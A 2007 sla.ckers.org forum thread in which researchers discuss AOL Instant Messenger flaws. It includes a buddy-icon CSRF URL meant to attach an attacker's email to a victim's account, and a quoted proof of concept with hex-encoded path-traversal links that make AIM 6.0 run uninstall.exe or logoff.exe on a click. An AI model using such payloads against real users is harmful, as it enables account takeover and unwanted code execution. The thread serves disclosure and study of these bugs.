Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
AOL Instant Messenger CSRF
Date: February 25, 2007 04:16PM

I discovered the original exploit to using the AOL Instant Messenger buddy icon to execute scripts and things more than 3 years ago, but since then I've played around with it a little every few months. Last installment I discovered that using image tags within the buddy icon could actually call up a remote site, which helped me create a PHP script to log User-Agents and IP via AIM buddy icon without connection. Today I believe I've found a new hole within the system.
The only discrepancy is that the user on the receiving end needs to have never confirmed the email address to their account, and must be using a version of AIM, which allows them to remain logged in to the AIM network (AIM Today, and the rest of those shitty features) at all times. A simple GET request to "https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=my.screenname.aol.com&lang=en&locale=us&mcState=doEmailNag&newEmail=YOUREMAILHERE&nag=newEmail" via the buddy icon should send an email to your specified address awaiting a confirmation. If I didn't explain it well enough it's because I'm in a hurry as my girlfriend wants me off the computer, and wants me to grill up some Chicken.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/



Edited 1 time(s). Last edit at 02/25/2007 04:16PM by Awesome AnDrEw.

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Posted by: dero
Date: February 28, 2007 08:13PM

This is quite interesting. Although I can't seem to get it to work. I'm assuming the original idea was to confirm the victims e-mail address which is actually yours, so in turn you should be able to request a lost password and hopefully receive theirs or a temporary password. Everything seem to go okay until I got an alert box telling me that the next time I log in I would have to confirm my e-mail address.

"You are no longer signed onto Screen Name Service. You will be prompted to confirm your e-mail address the next time you login"

But haven't been able to log into my Web account because I don't know the answer to one of my security questions that I just discarded when I registered. I'm going to play around with this for a while with different accounts. But it looks like the e-mail address you submit has to be confirmed upon next login.

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Posted by: rsnake
Date: February 28, 2007 09:35PM

Yah, stop grilling chicken and walk us through the steps, damnit! :)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Posted by: id
Date: February 28, 2007 10:12PM

Screw that, invite us over for some chicken!

-id

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Posted by: bubbles
Date: March 01, 2007 08:43AM

and beer!

-bubbles
http://webmastertutorials.net

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Posted by: jungsonn
Date: March 01, 2007 11:47AM

Ghehe... uhm. Yeah!

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Date: March 01, 2007 02:03PM

Okay, this should work, because it worked for me with the GET request, but like I said, there's some discrepancies, which may contribute to this failing.

Discrepancies I know about:
-Attacker must be using a version of AIM which supports non-graphical buddy icons such as sounds, commands, script, or HTML injected ones. I use 4.3.2229 (it's not vulnerable to any AIM crashes).

-Victim must be using a version of AIM, which allows them to remain logged into the AIM and AOL network at all times, and they must have this enabled (obviously the request wouldn't work if this was disabled).

-Victim must not have already confirmed the email address to their account.

-Victim must accept buddy icons.

With all those things set correctly, an HTML padded buddy icon calling on "https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=my.screenname.aol.com&lang=en&locale=us&mcState=doEmailNag&newEmail=YOUREMAILHERE&nag=newEmail" should yield a viable flaw.

For details on how to use the buddy icon as a CSRF visit this page http://awesomeandrew.net/index2.php?content=aimdataminer, and download the file (which is an example on how to use the buddy icon to steal a victim's IP simply by IMing them, and having their computer request a PHP file from a remote site).

EDIT: If anyone wants to hop on AIM, and setup themselves as the victim we'll be able to verify everything works here.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/



Edited 1 time(s). Last edit at 03/01/2007 02:10PM by Awesome AnDrEw.

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Posted by: dero
Date: March 01, 2007 05:56PM

I'll hop on aim and test it out with you. I'm running 5.9.6089 the version that is vulnerable to the font crash. And I wouldn't mind testing out older or newer versions either. My aim screename is dudegetoffaim

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Posted by: rsnake
Date: March 01, 2007 10:41PM

Can you CSRF anything? Meaning can you cause someone on AIM to de-anonymize?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Posted by: dero
Date: March 02, 2007 12:03AM

Ehh to an extent, really you can't get any information on the person from just having them visit the link or being forced to via buddy icon. All this does it just set up and e-mail address to send forgotten passwords to, because AIM doesn't force you to verify your e-mail address or even ask you for one, Most users just skip the whole thing or enter their information (e-mail address) which then an E-mail is sent to this address and requests verification. But verification is not required for you to use your newly registered AIM screenname. So in theory this would allow you to submit a new e-mail address for any user that has not verified their e-mail address. Which would allow you to confirm a place to send confidential information to. But from what I've tested so far, once you submit your newly appointed e-mail address. It waits for confirmation from the user to make sure this is the new address to which information should be sent to, Thus rendering this whole thing useless. The whole idea was to have the password, but this request has to be verified with someone who knows the password.

Or I could be completely wrong, I have yet to test this with the main man.
More 1999 AOL phishing in the future?
Most likely not.

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Date: March 02, 2007 12:04AM

I played around with that a little the other day, but it does not seem to recognize its own "aim" protocol, or javascript, but you can insert HTML in the icon, and create a text link which accesses the protocol, but that'd rely on curious users. As I discovered in 2004 the icons are also vulnerable to being used as script, or batch files, because some versions of AIM are always installed in the same directory, and so therefore links using the "%n" attribute (it's replaced with the viewer's screenname) in the user profile help target specific directories where the icon can be executed from. With those combined you can script in the AIM protocol to get the desired effect [set the away message, add buddies, add groups, open an IM (which could contain a font crash overflow string that would immediately cause the user's client to error), excetra]. I'm on the Wii right now, but I suppose at a later time I could write a complete and comprehensible guide to using the icons.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Date: March 02, 2007 12:08AM

Rsnake, that can be circumvented by a new exploit found by another person using "AIM Phone". His URL allows it to be done without confirmation making the overall hole still viable, but again I'm on the Wii so I can not get the URL at this moment.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Posted by: dero
Date: March 02, 2007 12:20AM

How's typing on a Wii? I'm on AIM if you'd like to test.

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Date: March 02, 2007 12:24AM

Okay, the site's down right now, but I grabbed the cached version of it from Google. Apparently not online can you update the email address without verification, but there's another exploit, which shows the new AIM doesn't parse links correctly, and ends up execute files (which helps you on your quest to affect more aspects of AIM).

The email exploit found by aliptix can be found here when his site comes back online: http://www.aliptix.net/site/files/articles/emailexploit.txt

Below is the documentation on how AIM parses HTML links.

Quote

Originally founded by aliptix

By exploiting how AIM 6.0 parses and runs links, you can force AIM to uninstall itself without a confirmation,
using a simple link.

AIM 6.0 does not protect against having files executed from links. You could send
click me and as soon as they click it they will shut
down. Now for this to work you need to know the windows version and the drive they are running AIM on,
so how would this be an exploit? Read on.

A Brief Description of How This Exploit Works:
When sending links, if you include a colon in the URL, AIM automatically adds the path to the
imApp/[version]/content/im directory of AIM.

Example:

Send:

Code (html)
<a href="http://www.haxt.net/v6/:">a</a>
AIM Replaces This With:

Code (html)
<a title=":" href="file:///c:/program%20files/aim6/services/imApp/ver6_0_28_1/content/im/:">a</a>
After Changing the Directory:

Code (html)
<a title=":" href="file:///c:/aim6%20test/services/imApp/ver6_0_28_1/content/im/:">a</a>
So, as you can see, a simple colon will throw in the drive, path of the im folder, then tack on that colon.

You can add things after the colon to change the URL, so if you send

Code (html)
<a href="http://www.haxt.net/v6/hey.html">a</a>
You Get:

Code (html)
<a title=":" href="file:///c:/program%20files/aim6/services/imApp/ver6_0_28_1/content/im/:/hey.html">a</a>
So why not try directory transversal to run files since a colon supplies the path we need?
Well, AOL thought of this, and decided to filter it out, but I don’t see why since you could just use
file:c:/windows/system32/logoff.exe or a direct path to another file you wanted to run, and that
won’t get filtered.

So since /.. or even /. gets filtered out of our URLs we have to use hex encoded /../’s


Proof of Concept Send:
This will uninstall AIM by the click of a link without a confirmation and without having to know the install
drive or path, although you are limited to basically running just the files in the AIM install folders.

This is assuming that the uninstall.exe is still in the same place as normal.
For me this is Drive:\main AIM directory\uninstall.exe

Code (html)
<a href="http://www.haxt.net/v6/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/uninstall.exe">click!</a>
for more information, aliptix.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Date: March 02, 2007 02:13AM

Let's just call this one a wash for now. There's obviously some more incompatibilities that need to be addressed, because when we tried it my normal icon didn't even appear.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: AOL Instant Messenger CSRF
Posted by: kirke
Date: March 24, 2007 05:38AM

a bit off-topic to this thread, anyway:
http://sla.ckers.org/forum/read.php?3,44,page=42#msg-8824

there you probably can mount website spoofing using XSS ;-)

Options: ReplyQuote


Sorry, only registered users may post in this forum.